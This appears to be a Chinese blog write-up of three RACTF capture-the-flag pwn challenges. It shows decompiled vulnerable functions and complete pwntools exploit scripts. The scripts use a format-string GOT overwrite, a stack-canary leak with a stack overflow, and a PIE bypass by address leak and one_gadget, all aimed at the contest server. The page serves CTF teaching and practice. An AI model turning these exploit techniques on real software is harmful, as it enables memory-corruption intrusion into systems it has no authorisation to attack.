RACTF Writeup pwn

最新推荐文章于 2024-01-27 19:28:10 发布
最新推荐文章于 2024-01-27 19:28:10 发布
阅读量406 收藏 1
点赞数
文章标签: 信息安全 pwn 格式化字符串 PIE Canary
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/106663063
版权

大不列颠的 Rating 0 赛,还是持续 4 天的

Not Really AI

分析

保护情况

全关

漏洞函数

简单格式化字符串

int response()
{
  char s; // [esp+0h] [ebp-208h]

  puts("How are you finding RACTF?");
  fgets(&s, 0x200, stdin);
  puts("I am glad you");
  printf(&s);
  return puts("\nWe hope you keep going!");
}

思路

有预留后门,直接找个跳转的地方改了就行,改了 puts plt 表。

exp

from pwn import *

context.log_level = 'debug'
#p = process("./nra")
p = remote("95.216.233.106",40592)

payload = '%69c%15$hhn%77c%16$hhn%114c%17$hhn%4c%18$hhn'+ p32(0x804c018)+p32(0x804c018+1)+p32(0x804c018+2)+p32(0x804c018+3)
p.recvuntil("RACTF?\n")
p.sendline(payload)

p.interactive()

Finches in a Stack

分析

保护情况
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
漏洞函数

两处栈溢出加上一个格式化字符串。

unsigned int say_hi()
{
  char *v0; // eax
  char v2; // [esp+3h] [ebp-25h]
  char s[20]; // [esp+8h] [ebp-20h]
  unsigned int v4; // [esp+1Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  printf("Hi! What's your name? ");
  gets(s);                                      // 栈溢出
  printf("Nice to meet you, ");
  v0 = &s[strlen(s)];
  *(_WORD *)v0 = '\n!';                         
  v0[2] = 0;                                    
  printf(s);                                    // 格式化字符串
  puts("Do YOU want to pet my canary?");
  gets(&v2);
  return __readgsdword(0x14u) ^ v4;
}

思路

有预留的后门函数,再有一个长度足够的栈溢出,有可能控制 eip 跳转到后门。程序开了 canary 那肯定要绕过,刚好有格式化字符串可以泄露 canary 值。调试一下得到偏移为: 11

# 泄露 canary
payload = 'aaaa' + "%11$p"

栈溢出控制跳转:

payload = 'b'*25 + p32(canary) + p32(flag)*4

exp

from pwn import *

context.log_level = 'debug'

#p = process("./fias")
p = remote("95.216.233.106",45107)
elf = ELF("./fias")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

flag = 0x80491D2

payload = 'aaaa' + "%11$p"
p.recvuntil("name?")
p.sendline(payload)
p.recvuntil('aaaa')
canary = int(p.recvuntil('!',drop=True),16)
log.info("canary:"+hex(canary))

payload = 'b'*25 + p32(canary) + p32(flag)*4
p.recvuntil("canary?\n")
#gdb.attach(p)
p.sendline(payload)

p.interactive()

Finches in a Pie

分析

保护情况
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
漏洞函数

和上一题一样的栈溢出和格式化字符串,区别是这题开了 PIE。

unsigned int say_hi()
{
  char *v0; // eax
  char v2; // [esp+3h] [ebp-25h]
  char s[20]; // [esp+8h] [ebp-20h]
  unsigned int v4; // [esp+1Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  puts("CATCH HIM!\n");
  puts("You got him! Thank you!");
  puts("What's your name?");
  gets(s);                                      // 栈溢出
  printf("Thank you, ");
  v0 = &s[strlen(s)];
  *(_WORD *)v0 = '\n!';
  v0[2] = 0;
  printf(s);                                    // 格式化字符串
  puts("Would you like some cake?");
  gets(&v2);                                    // 栈溢出
  return __readgsdword(0x14u) ^ v4;
}

思路

和上题区别是开了 PIE ,不能直接得到后门地址,需要绕过 PIE 保护。一开始想着 partial write ,没有找到有能跳转的地方。后面改用泄露地址,计算出真实地址,从而绕过 PIE 。

用格式化字符串可以泄露出 text 段和 libc 的地址。实际测试泄露 libc 地址调用 onegadget 无效,最后还是乖乖泄露 text 段地址,调用预留后门。

'''
11 : canary 偏移
15 :0x13D9 对应的text实际地址(在main中)
'''
payload = 'aaaa' + "%11$p" + "|" + "%15$p" + "|"

然后就是和上一题一样操作。

payload = 'b'*25 + p32(canary) + 'b'*0xc + p32(flag)

exp

泄露 text 段
from pwn import *

context.log_level = 'debug'

p = process("./fiap")
#p = remote("95.216.233.106",45459)
elf = ELF("./fiap")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

payload = 'aaaa' + "%11$p" + "|" + "%15$p" + "|"
p.recvuntil("name?\n")
gdb.attach(p)
p.sendline(payload)
p.recvuntil('aaaa')
canary = int(p.recvuntil('|',drop=True),16)
log.info("canary:"+hex(canary))
text_leak = int(p.recvuntil('|',drop=True),16)
log.info("text_leak:"+hex(text_leak))
flag = text_leak - 0x1d0
log.info("flag:"+hex(flag))


payload = 'b'*25 + p32(canary) + 'b'*0xc + p32(flag)
p.recvuntil("cake?\n")

p.sendline(payload)

p.interactive()
泄露 libc (仅本地可用)
from pwn import *

context.log_level = 'debug'

p = process("./fiap")
#p = remote("95.216.233.106",45459)
elf = ELF("./fiap")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

one_gadget = 0x5fbc5

payload = 'aaaa' + "%11$p" + "|" + "%23$p" + "|"
p.recvuntil("name?\n")
gdb.attach(p)
p.sendline(payload)
p.recvuntil('aaaa')
canary = int(p.recvuntil('|',drop=True),16)
log.info("canary:"+hex(canary))
libc_leak = int(p.recvuntil('|',drop=True),16)
log.info("libc_leak:"+hex(libc_leak))
libc_base = libc_leak - 99895
log.info("libc_base:"+hex(libc_base))
system = libc_base + libc.symbols['system']
log.info("system:"+hex(system))
one_gadget += libc_base
log.info("one_gadget:"+hex(one_gadget))

payload = 'b'*25 + p32(canary) + 'b'*0xc + p32(one_gadget)
#payload = 'bbbbb'
p.recvuntil("cake?\n")

p.sendline(payload)

p.interactive()

PIE 绕过

PIE保护详解和常用bypass手段

SkYe231_
关注
2024 高校网络安全管理运维赛 -实践能力赛项Writeup(pwn部分解析)
weixin_39435784的博客
05-09 647
2024 高校网络安全管理运维赛 -实践能力赛项Writeup(pwn部分解析)
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 433
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
polaris:RACTF挑战调度程序
04-17
:triangular_flag: :flag_in_hole: :chequered_flag: :rainbow_flag: 强大的CTF平台 一个用于托管网络安全的真棒框架捕获Flag事件 | | | | | CTF框架不会在整个事件中分崩离析。 由团队和使用:red_heart:︎ 目录 特征 安装 支持 执照 特征 稳健性:在具有数千名用户的现场活动中进行了测试,并且经过了人为的压力测试。 拆分体系结构:我们的体系结构允许您在不同的主机上运行各种组件,以提高性能。 高度可配置:我们为您的活动提供了大量选项。 真的很棒:毕竟是它的名字! 安装 签出安装程序。 需要更多自定义部署吗? 查看我们的安装文档。 支持 如果需要支持,请查看我们的Discord ,或者如果发现框架有错误,请打开一个问题。 :locked: 发现安全问题? 给我们发送电子邮件至security@ractf.co.uk 。 执照 AGPLv3
[WP]RACTF-Writeup
Y4tacker的博客
08-17 803
文章目录Webnotebooknotebook2明天早上继续 Web notebook 首先我们能看到文件,在urls.py里面查看路由 我第一眼锁定了这个os.path.join函数 如果参数是/flag那么后面经过函数处理就会是flag 因此我们只需要传入{{/flag.txt}}按理说应该就能够得到flag,但是很不幸不可以 在创建的时候这里进行了替换 这里将..替换为空{{替换为空 但这里因为先后顺序很明显有一个逻辑漏洞,因此我们只需要构造 {..{/flag.txt}..} 即可绕过读取
RACTF Write up
Ustinian001219的博客
10-11 130
RACTF wp Cryptography-Constant Primes 题目给出的密文C如上,可以使用在线16进制转10进制网站统一转为10进制 附加内容如下: 提供了私钥,可以使用python中的Crypto模块读取私钥恢复内容,但在此为了解题速度可以直接找一个在线网站直接解密私钥,如下: 能给的都给了,就差给flag了,解析出n,e,d,p,q,加上密文c,直接构造脚本如下: 手动逆序flag提交 Cryptography-Carousel 题目给的密文,看样子类似rot47,直接在线网
二进制的保护机制
weixin_30872671的博客
05-29 270
这里主要讲的是CTF中linux下的ELF二进制文件的保护机制。在linux中有一个脚本checksec命令可以查看当前二进制文件的保护机制。任意安装一款gdb插件都会把checksec脚本包含进来。 在gdb中执行: gdb> checksec test Canary : No NX ...
CTFpwn常见保护及绕过:pie,canary
最新发布
2302_79813730的博客
01-27 2875
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
[BUGKU][CTF][PWN][2020] PWN writeup
dadongwudi的博客
01-12 650
PWN1 关键字:nc 知识点:nc使用方法 https://www.cnblogs.com/nmap/p/6148306.html nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。nc不仅可以使用IPv4和IPv6,而且可以为用户提供无限的潜在用途。 在nc的大量功能中,有能力将nc链接在一起;TCP、UDP和到其他站点的SCTP端口;支持
CTF writeup之pwn2own warehouse
chenzhenyu1983的博客
11-23 691
近来练习CTF,主要是PWN,有点小心得。分享一系列的writeup。 这题是pwn2own的一道pwn题--warehous。 一、题目分析 elf文件打开了NX和canary。 分析一下题目功能 题目还是比较简单的。在main函数里能调用store函数,并实现任意地址写。即可以跳过canary覆盖返回地址。并实现ROP。最终调用system("sh")
NUAACTF pwn string writeup
qq_39596232的博客
08-24 1651
题目描述: 菜鸡遇到了Dragon,有一位巫师可以帮助他逃离危险,但似乎需要一些要求 题目分析: 1、首先查看下文件的信息及其保护机制: tucker@ubuntu:~/pwn$ file string string: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter...
andromeda:管理RACTF的docker容器部署和扩展
02-18
andromeda:管理RACTF的docker容器部署和扩展
Kali Linux安全渗透
01-02
对Kali Linux安全渗透进行学习,有利于新人对linux核心如何运作有进一步了解
shell:RACTF核心的闪亮的新SPA前端
04-04
RACTF外壳 安装 ractf/shell作为静态单页应用程序运行。 这意味着您将需要一个单独的Web服务器来提供文件-nginx或apache通常可以完成这项工作。 构建该应用程序的唯一依赖项是node.js,此安装在发行版之间广泛分布。 有关更多详细信息,请参见。 由于该项目包含子模块,因此应使用以下命令执行克隆: git clone --recursive https://github.com/ractf/shell 在构建之前,需要更改一些设置。 在.env.production文件中, REACT_APP_WSS_URL变量更改为后端的websocket位置。 这通常是wss://[domain]/api/v2/ws 。 您可能还希望将REACT_APP_SENTRY_DSN更改为指向Sentry DSN。 此外,如果您想使用Google Analytics(分析),请设
透过 checksec 学习 Linux 防溢出攻击保护措施
CHOOOU的博客
11-13 2083
最近用到了 checksec,想整理整理一些 Linux 防溢出的保护措施,因为容易弄混。。 Checksec是一个bash脚本,用于检查可执行文件的属性(如PIE,RELRO,PaX,Canaries,ASLR,Fortify Source),例如: USER@NAME:~# checksec a [*] '/a' Arch: i386-32-little RELRO: ...
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1465
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 764
bjdctf_2020_babyrop
【WP】攻防世界新手区pwn writeup
极客剑寮
09-08 222
CGfsb 题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050 下载文件后,使用file命令查看。 32位的文件,用ida打开,F5查看伪代码。 printf漏洞:https://www.cnblogs.com/cfans1993/articles...
rating 赛
tyxZ2001的博客
11-01 139
Chloe and the sequence 题解:这个题就是找规律,1 + 2x 的位置值都是 1,2 + 4x 的位置的值都是 2,4 + 8x 的位置的数都是 3,8 + 16x 的位置的数都是 4… #include<bits/stdc++.h> #define ll long long #define speed_up ios::sync_with_stdio(false);cin.tie(0);cout.tie(0); using namespace std; long long
BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】
kety_gz的博客
09-03 9329
buku的pwn按照难度的顺序依次是pwn1,pwn2,pwn4,pwn5,pwn3 这些题目的libc pwn1 nc连接后直接就有执行权限 ls cat flag 得到flag pwn2 下载文件放入ida 有一个有shell,我们只需要将程序跳转到这里 选择main F5查看代码 看到这个s申请了0x30个字节,但是下边read了0x100字节,就造成了栈溢出,我们只要将返回地址溢出为...
HFCTF2022线上赛官方Writeup:WEB、CRYPTO与PWN挑战解析
"HFCTF2022线上赛官方Writeup1主要涵盖了多个网络安全和编程挑战,包括WEB、CRYPTO、PWN、REVERSE和MISC等类别。其中,题目涉及了RSA加密、MD5哈希、zlib压缩、SSRF漏洞利用、元数据解析、动态链接器预加载(ld_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值